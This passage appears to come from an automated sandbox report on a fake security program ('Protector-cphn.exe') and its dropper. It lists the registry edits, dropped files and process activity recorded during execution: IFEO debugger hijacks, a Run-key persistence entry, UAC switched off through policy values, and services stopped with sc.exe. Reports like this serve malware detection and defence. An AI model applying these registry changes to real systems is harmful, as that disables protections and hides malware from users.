| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\lucomserver.exe | C:\Users\Admin\AppData\Roaming\Protector-cphn.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avmcdlg.exe\Debugger = "svchost.exe" | C:\Users\Admin\AppData\Roaming\Protector-cphn.exe | N/A |
Stops running service(s)
Checks computer location settings
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Key value queried | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\81bc906307d99bcb8b3aeaceb1d51b5c_JaffaCakes118.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\RarSFX0\dvj45s81vl7c89u.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\RarSFX1\56m04a7z799e88f.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RarSFX0\dvj45s81vl7c89u.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RarSFX1\56m04a7z799e88f.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Protector-cphn.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Inspector = "C:\\Users\\Admin\\AppData\\Roaming\\Protector-cphn.exe" | C:\Users\Admin\AppData\Roaming\Protector-cphn.exe | N/A |
Checks whether UAC is enabled
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Users\Admin\AppData\Roaming\Protector-cphn.exe | N/A |
Indicator Removal: File Deletion
Drops file in System32 directory
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| File opened for modification | C:\Windows\SysWOW64\services.msc | C:\Users\Admin\AppData\Roaming\Protector-cphn.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\eventvwr.msc | C:\Users\Admin\AppData\Roaming\Protector-cphn.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\diskmgmt.msc | C:\Users\Admin\AppData\Roaming\Protector-cphn.exe | N/A |
Launches sc.exe
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\sc.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\sc.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\sc.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\sc.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\81bc906307d99bcb8b3aeaceb1d51b5c_JaffaCakes118.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\Protector-cphn.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\sc.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\sc.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\RarSFX1\56m04a7z799e88f.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\sc.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\RarSFX0\dvj45s81vl7c89u.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\sc.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Internet Explorer\GPU\AdapterInfo = "vendorId=\"0x10de\",deviceID=\"0x8c\",subSysID=\"0x0\",revision=\"0x0\",version=\"10.0.19041.546\"hypervisor=\"No Hypervisor (No SLAT)\"" | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FullScreen = "no" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Software\Microsoft\Internet Explorer\DomainSuggestion | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion\FileNames\ | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Internet Explorer\Recovery\AdminActive\{E9BEAA60-9745-11EF-BDBF-4A034D48373C} = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Software\Microsoft\Internet Explorer\Main | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 702820bf522bdb01 | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion\FileNames | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Software\Microsoft\Internet Explorer\Main | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastUpdateHighDateTime = "31140690" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateHighDateTime = "31140690" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE ERROR PAGE BYPASS ZONE CHECK FOR HTTPS KB954312\iexplore.exe = "1" | C:\Users\Admin\AppData\Roaming\Protector-cphn.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastTTLHighDateTime = "50" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateLowDateTime = "3192493666" | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "437116175" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Software\Microsoft\Internet Explorer\VersionManager | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion\FileNames\en-US = "en-US.1" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Software\Microsoft\Internet Explorer\GPU | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 80fc18bf522bdb01 | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb0100000013dbeb74f69550459d232b3693c378ca000000000200000000001066000000010000200000001e2c830cc4003afc945a40fb9bea89897772c71535671078aa07f0b2c2854008000000000e80000000020000200000002cd119bfa40e4dec180355990b8297d2084f7dac45f6b2e2e42cd83d47895b7a20000000c2cfe00fd66053b9f423c70ee1a9c476dd36f85ec5dd1a9c568152ec1de028cd400000006a0e32a146a8e1a5b442e3722966ff1649297b1fa6bae68609cea8e78a85369832886e808037a67648feca1845e03f61bfb902af5f3d8660eaa5ccaee77a10a9 | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastTTLLowDateTime = "1251635200" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateLowDateTime = "3191243263" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Software\Microsoft\Internet Explorer\VersionManager | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastUpdateLowDateTime = "3192493666" | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastUpdateHighDateTime = "31140690" | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE ERROR PAGE BYPASS ZONE CHECK FOR HTTPS KB954312 | C:\Users\Admin\AppData\Roaming\Protector-cphn.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastUpdateLowDateTime = "3191243263" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateHighDateTime = "31140690" | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb0100000013dbeb74f69550459d232b3693c378ca0000000002000000000010660000000100002000000063a7059ba8c2a8311f0cab0aac09ce30f96088761523aed9368f5a7f7443d73c000000000e8000000002000020000000ac6863a2b68c1ef6b99d1cabe9b3c679c2fa210b60db568f9ce0e3d8d63699ba2000000071b187c2eff2d97bed4d252cb9d3daf6321c586b9d065e5ed63fefe1fdcb24344000000025f068a37d012ca30dc999034a67d7959eee431c4c809d5505814f19524e20207d1d4a768e3c4acbc4fb117b3c4aa3ea43b1e5365741d060c915cc4ae8e42403 | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\ | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{9A8B544C-FE00-48E5-EE90-DD9BC4630D55}\VersionIndependentProgID\ = "WbemScripting.SWbemNamedValueSet" | C:\Users\Admin\AppData\Local\Temp\RarSFX1\56m04a7z799e88f.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{9A8B544C-FE00-48E5-EE90-DD9BC4630D55}\ = "Viviki.Adajo" | C:\Users\Admin\AppData\Local\Temp\RarSFX1\56m04a7z799e88f.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{9A8B544C-FE00-48E5-EE90-DD9BC4630D55}\ProgID\ | C:\Users\Admin\AppData\Local\Temp\RarSFX1\56m04a7z799e88f.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{9A8B544C-FE00-48E5-EE90-DD9BC4630D55}\Programmable\ | C:\Users\Admin\AppData\Local\Temp\RarSFX1\56m04a7z799e88f.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{ABD569BC-978A-E4EC-23AC-8FA5F9A66FBA}\1.0\0\win32\ | C:\Users\Admin\AppData\Local\Temp\RarSFX1\56m04a7z799e88f.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{9A8B544C-FE00-48E5-EE90-DD9BC4630D55}\InProcServer32 | C:\Users\Admin\AppData\Local\Temp\RarSFX1\56m04a7z799e88f.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{9A8B544C-FE00-48E5-EE90-DD9BC4630D55}\ProgID | C:\Users\Admin\AppData\Local\Temp\RarSFX1\56m04a7z799e88f.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{ABD569BC-978A-E4EC-23AC-8FA5F9A66FBA}\1.0\0\ | C:\Users\Admin\AppData\Local\Temp\RarSFX1\56m04a7z799e88f.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{ABD569BC-978A-E4EC-23AC-8FA5F9A66FBA}\1.0\FLAGS\ | C:\Users\Admin\AppData\Local\Temp\RarSFX1\56m04a7z799e88f.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{9A8B544C-FE00-48E5-EE90-DD9BC4630D55}\Programmable | C:\Users\Admin\AppData\Local\Temp\RarSFX1\56m04a7z799e88f.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{ABD569BC-978A-E4EC-23AC-8FA5F9A66FBA}\ | C:\Users\Admin\AppData\Local\Temp\RarSFX1\56m04a7z799e88f.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{ABD569BC-978A-E4EC-23AC-8FA5F9A66FBA}\1.0\FLAGS\ = "0" | C:\Users\Admin\AppData\Local\Temp\RarSFX1\56m04a7z799e88f.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{9A8B544C-FE00-48E5-EE90-DD9BC4630D55}\VersionIndependentProgID\ | C:\Users\Admin\AppData\Local\Temp\RarSFX1\56m04a7z799e88f.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{9A8B544C-FE00-48E5-EE90-DD9BC4630D55}\InProcServer32\ | C:\Users\Admin\AppData\Local\Temp\RarSFX1\56m04a7z799e88f.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{ABD569BC-978A-E4EC-23AC-8FA5F9A66FBA}\1.0\0\win64 | C:\Users\Admin\AppData\Local\Temp\RarSFX1\56m04a7z799e88f.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{9A8B544C-FE00-48E5-EE90-DD9BC4630D55}\Version | C:\Users\Admin\AppData\Local\Temp\RarSFX1\56m04a7z799e88f.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{9A8B544C-FE00-48E5-EE90-DD9BC4630D55} | C:\Users\Admin\AppData\Local\Temp\RarSFX1\56m04a7z799e88f.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{9A8B544C-FE00-48E5-EE90-DD9BC4630D55}\InProcServer32\ = "%SystemRoot%\\SysWow64\\wbem\\wbemdisp.dll" | C:\Users\Admin\AppData\Local\Temp\RarSFX1\56m04a7z799e88f.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{ABD569BC-978A-E4EC-23AC-8FA5F9A66FBA}\1.0\ = "MTS 2.0 Admin Type Library" | C:\Users\Admin\AppData\Local\Temp\RarSFX1\56m04a7z799e88f.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{9A8B544C-FE00-48E5-EE90-DD9BC4630D55}\TypeLib\ = "{ABD569BC-978A-E4EC-23AC-8FA5F9A66FBA}" | C:\Users\Admin\AppData\Local\Temp\RarSFX1\56m04a7z799e88f.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{ABD569BC-978A-E4EC-23AC-8FA5F9A66FBA}\1.0\FLAGS | C:\Users\Admin\AppData\Local\Temp\RarSFX1\56m04a7z799e88f.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{ABD569BC-978A-E4EC-23AC-8FA5F9A66FBA}\1.0\ | C:\Users\Admin\AppData\Local\Temp\RarSFX1\56m04a7z799e88f.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{ABD569BC-978A-E4EC-23AC-8FA5F9A66FBA}\1.0\0 | C:\Users\Admin\AppData\Local\Temp\RarSFX1\56m04a7z799e88f.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{ABD569BC-978A-E4EC-23AC-8FA5F9A66FBA}\1.0\0\win32 | C:\Users\Admin\AppData\Local\Temp\RarSFX1\56m04a7z799e88f.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{ABD569BC-978A-E4EC-23AC-8FA5F9A66FBA}\1.0\0\win64\ = "C:\\Windows\\SysWow64\\Com\\mtsadmin.tlb" | C:\Users\Admin\AppData\Local\Temp\RarSFX1\56m04a7z799e88f.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{9A8B544C-FE00-48E5-EE90-DD9BC4630D55}\ProgID\ = "WbemScripting.SWbemNamedValueSet.1" | C:\Users\Admin\AppData\Local\Temp\RarSFX1\56m04a7z799e88f.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{ABD569BC-978A-E4EC-23AC-8FA5F9A66FBA}\1.0 | C:\Users\Admin\AppData\Local\Temp\RarSFX1\56m04a7z799e88f.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{ABD569BC-978A-E4EC-23AC-8FA5F9A66FBA}\1.0\0\win64\ | C:\Users\Admin\AppData\Local\Temp\RarSFX1\56m04a7z799e88f.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{9A8B544C-FE00-48E5-EE90-DD9BC4630D55}\VersionIndependentProgID | C:\Users\Admin\AppData\Local\Temp\RarSFX1\56m04a7z799e88f.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{9A8B544C-FE00-48E5-EE90-DD9BC4630D55}\Version\ | C:\Users\Admin\AppData\Local\Temp\RarSFX1\56m04a7z799e88f.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{9A8B544C-FE00-48E5-EE90-DD9BC4630D55}\Version\ = "1.0" | C:\Users\Admin\AppData\Local\Temp\RarSFX1\56m04a7z799e88f.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{ABD569BC-978A-E4EC-23AC-8FA5F9A66FBA} | C:\Users\Admin\AppData\Local\Temp\RarSFX1\56m04a7z799e88f.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{ABD569BC-978A-E4EC-23AC-8FA5F9A66FBA}\1.0\0\win32\ = "C:\\Windows\\SysWOW64\\Com\\mtsadmin.tlb" | C:\Users\Admin\AppData\Local\Temp\RarSFX1\56m04a7z799e88f.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{9A8B544C-FE00-48E5-EE90-DD9BC4630D55}\TypeLib | C:\Users\Admin\AppData\Local\Temp\RarSFX1\56m04a7z799e88f.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{9A8B544C-FE00-48E5-EE90-DD9BC4630D55}\TypeLib\ | C:\Users\Admin\AppData\Local\Temp\RarSFX1\56m04a7z799e88f.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\RarSFX1\56m04a7z799e88f.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\RarSFX1\56m04a7z799e88f.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Roaming\Protector-cphn.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Users\Admin\AppData\Roaming\Protector-cphn.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Protector-cphn.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Protector-cphn.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Protector-cphn.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Protector-cphn.exe | N/A |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
Suspicious use of SendNotifyMessage
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Protector-cphn.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Protector-cphn.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Protector-cphn.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Protector-cphn.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RarSFX1\56m04a7z799e88f.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Protector-cphn.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Protector-cphn.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Protector-cphn.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Protector-cphn.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Protector-cphn.exe | N/A |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| N/A | N/A | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| N/A | N/A | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| N/A | N/A | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
Suspicious use of WriteProcessMemory
System policy modification
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System | C:\Users\Admin\AppData\Roaming\Protector-cphn.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Users\Admin\AppData\Roaming\Protector-cphn.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" | C:\Users\Admin\AppData\Roaming\Protector-cphn.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorUser = "0" | C:\Users\Admin\AppData\Roaming\Protector-cphn.exe | N/A |
Processes
| Process | Command line |
